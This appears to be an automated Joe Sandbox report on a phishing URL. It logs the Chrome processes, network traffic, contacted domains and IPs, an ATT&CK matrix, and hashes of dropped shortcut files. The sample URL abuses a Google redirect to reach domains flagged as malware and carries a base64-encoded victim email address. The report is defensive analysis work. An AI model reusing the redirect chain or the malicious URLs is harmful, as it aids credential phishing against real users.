Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 61312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal52.win@22/76@42/15
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1908,i,13844692018575917634,11113363890473610218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1908,i,13844692018575917634,11113363890473610218,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://r.bitualicar.ru/favicon.ico0%Avira URL Cloudsafe
https://r.bitualicar.ru/2Q5WxE/100%Avira URL Cloudmalware
https://technicdude.in/favicon.ico100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com.vn
216.58.212.163
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.2.137
      truefalse
        high
        fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru
        104.21.32.1
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.25.14
          truefalse
            high
            challenges.cloudflare.com
            104.18.94.41
            truefalse
              high
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                www.google.com
                142.250.185.196
                truefalse
                  high
                  technicdude.in
                  185.221.216.102
                  truefalse
                    unknown
                    r.bitualicar.ru
                    104.21.86.91
                    truetrue
                      unknown
                      google.com.vn
                      142.250.185.195
                      truefalse
                        high
                        www.office.com
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            identity.nel.measure.office.net
                            unknown
                            unknownfalse
                              high
                              login.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/90291484da19c332/1736977815027/e9acd9776db8af061e63561248b6ab76ea6837c01ef68085ad9c2eeed95e0306/2q1Yjtdn1go6iXdfalse
                                      high
                                      https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==false
                                        high
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/false
                                            high
                                            https://a.nel.cloudflare.com/report/v4?s=tVdO1wjIvtScIyPqcAdcVd9vYWRCll2pZWUyzKb8JzQ7RJd0m%2Fe4SC4lLYJAf96ojd0utNG6LYsmArISY6fonxozflMfIvLZADtb9vIBWcJIBNqTaFHpVUX%2FsDnyeA%3D%3Dfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/90291484da19c332/1736977815028/06i_wUjDLHdc2b4false
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                                  high
                                                  https://r.bitualicar.ru/2Q5WxE/#ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==false
                                                    unknown
                                                    https://r.bitualicar.ru/favicon.icofalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==false
                                                      unknown
                                                      https://r.bitualicar.ru/2Q5WxE/true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://technicdude.in/favicon.icofalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90291484da19c332&lang=autofalse
                                                        high
                                                        https://www.google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==false
                                                          high
                                                          https://www.google.com.vn/amp/technicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==false
                                                            high
                                                            https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                                              high
                                                              https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725746289109052.MDU2N2QyYWQtYjliNS00NmQ5LWE3MjItYjZlZTk5MWY1NTE1M2JmMGQ2MWQtNzBhYi00YmI0LTllMTEtMjliOThlMjgzY2Rh&ui_locales=en-US&mkt=en-US&client-request-id=3dfe3e9b-c811-46fa-aeb1-c321ea49dac0&state=bw2UfgHEltne4GWXT4ILmmgljtDCCaGi4hiCNYt3yVIU7Kgu5fuJlbonmZjb1xmFi6D75_m_uvBMpHFJ8ZTfwSv5cShhghv4dGACkbvjW6m4UihBZ4y8XNFE7w38W5qxitw4u-ATffQzDiP7S0g9xOEWKs-9fUgWPXs1cuc7cnDvurj2A12CRa3wPsNbgkSkkDU9NnNirqvoQAqaqLAE4J-uweN6ThPtHzFZrhCLu_Ph1uvL_Bhydf6KJ7_Gb52VF_AabCBubwUXygyXwF4fEQ&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://login.microsoftonline.comchromecache_98.2.dr, chromecache_89.2.drfalse
                                                                  high
                                                                  https://login.windows-ppe.netchromecache_98.2.dr, chromecache_89.2.drfalse
                                                                    high
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.18.94.41
                                                                    challenges.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    151.101.130.137
                                                                    unknownUnited States
                                                                    54113FASTLYUSfalse
                                                                    185.221.216.102
                                                                    technicdude.inUnited Kingdom
                                                                    393960HOST4GEEKS-LLCUSfalse
                                                                    35.190.80.1
                                                                    a.nel.cloudflare.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.21.86.91
                                                                    r.bitualicar.ruUnited States
                                                                    13335CLOUDFLARENETUStrue
                                                                    104.17.24.14
                                                                    unknownUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    104.21.32.1
                                                                    fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ruUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    104.18.95.41
                                                                    unknownUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    151.101.2.137
                                                                    code.jquery.comUnited States
                                                                    54113FASTLYUSfalse
                                                                    239.255.255.250
                                                                    unknownReserved
                                                                    unknownunknownfalse
                                                                    142.250.185.196
                                                                    www.google.comUnited States
                                                                    15169GOOGLEUSfalse
                                                                    142.250.185.195
                                                                    google.com.vnUnited States
                                                                    15169GOOGLEUSfalse
                                                                    216.58.212.163
                                                                    www.google.com.vnUnited States
                                                                    15169GOOGLEUSfalse
                                                                    104.17.25.14
                                                                    cdnjs.cloudflare.comUnited States
                                                                    13335CLOUDFLARENETUSfalse
                                                                    IP
                                                                    192.168.2.8
                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                    Analysis ID:1592211
                                                                    Start date and time:2025-01-15 22:48:58 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 3m 25s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:browseurl.jbs
                                                                    Sample URL:https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Detection:MAL
                                                                    Classification:mal52.win@22/76@42/15
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 142.250.185.131, 172.217.18.14, 64.233.184.84, 142.250.186.46, 142.250.185.238, 172.217.23.110, 199.232.210.172, 2.23.77.188, 142.250.186.78, 142.250.184.206, 20.190.160.14, 20.190.160.20, 40.126.32.140, 40.126.32.134, 40.126.32.136, 20.190.160.17, 40.126.32.133, 20.190.160.22, 13.107.6.156, 2.23.209.17, 2.23.209.34, 40.126.32.68, 40.126.32.72, 40.126.32.74, 40.126.32.138, 142.250.186.74, 216.58.206.74, 142.250.185.106, 142.250.185.202, 142.250.186.170, 142.250.185.138, 142.250.184.234, 216.58.206.42, 142.250.186.106, 172.217.16.202, 142.250.181.234, 142.250.185.234, 142.250.185.170, 172.217.18.10, 142.250.185.74, 142.250.186.42, 13.69.239.73, 52.178.17.3, 142.251.40.142, 74.125.0.74, 142.250.185.227, 2.18.64.220, 2.18.64.215, 217.20.57.34, 184.28.90.27, 20.109.210.53, 13.107.246.45, 52.149.20.212
                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.aadcdn.msftauth.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, onedscolprdneu03.northeurope.cloudapp.azure.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, e329293.dscd.akamaiedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, b-0004.b-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, r5.sn-t0aedn7e.gvt1.com, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, aadcdn.msftauth.edgekey.net, www.tm.aadcdn.msftauth.akadns.net, edgedl.me.gvt1.com, nel.measure.office.n
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    No simulations
                                                                    No context
                                                                    No context
                                                                    No context
                                                                    No context
                                                                    No context
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:50:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2677
                                                                    Entropy (8bit):3.9853980541926175
                                                                    Encrypted:false
                                                                    SSDEEP:48:8Hl0dFTNljHTidAKZdA1oehwiZUklqeh7y+3:8Hlmv4cy
                                                                    MD5:8DA69C22DF83D7F552B64DAFA8FD8986
                                                                    SHA1:47A01729955B41108D61977127133F74B703D0B8
                                                                    SHA-256:3831E9C5449F541156C538E88E6AE963B98668C252CBEE8A5A91F018C93288A9
                                                                    SHA-512:749E871CDD43FB67E962500EB5BE2A6F3AF4E762ACEFA3F444A6B388206E4691B3DD5085BBFF786607B1954E2FD7C01DE9551A21D4940563E9AA48F2E164359E
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:L..................F.@.. ...$+.,....O..m.g..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I/Z=.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z=.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z=.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z=............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 20:50:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2679
                                                                    Entropy (8bit):4.001683833734779
                                                                    Encrypted:false
                                                                    SSDEEP:48:8G0dFTNljHTidAKZdA1leh/iZUkAQkqehMy+2:8Gmvy9Q9y
                                                                    MD5:4A3328C5F8316430A7768B832514285A
                                                                    SHA1:696DC4A425F15849CE5B36F3F8CC54B4B7F9046A
                                                                    SHA-256:B1DCD6957A831A2E6C57FC9A19476685B6BB1FFFF266F3A5EE48DF255A575CEF
                                                                    SHA-512:60365605B0B54AB17F6BCCF5A83BE570E69612995261D12035AFFCC7DFBE7C9189376224B0168A54675B9AEDB7F8EF4A612B5161A263D8460552578B147FBE24
                                                                    Malicious:false
                                                                    Reputation:low
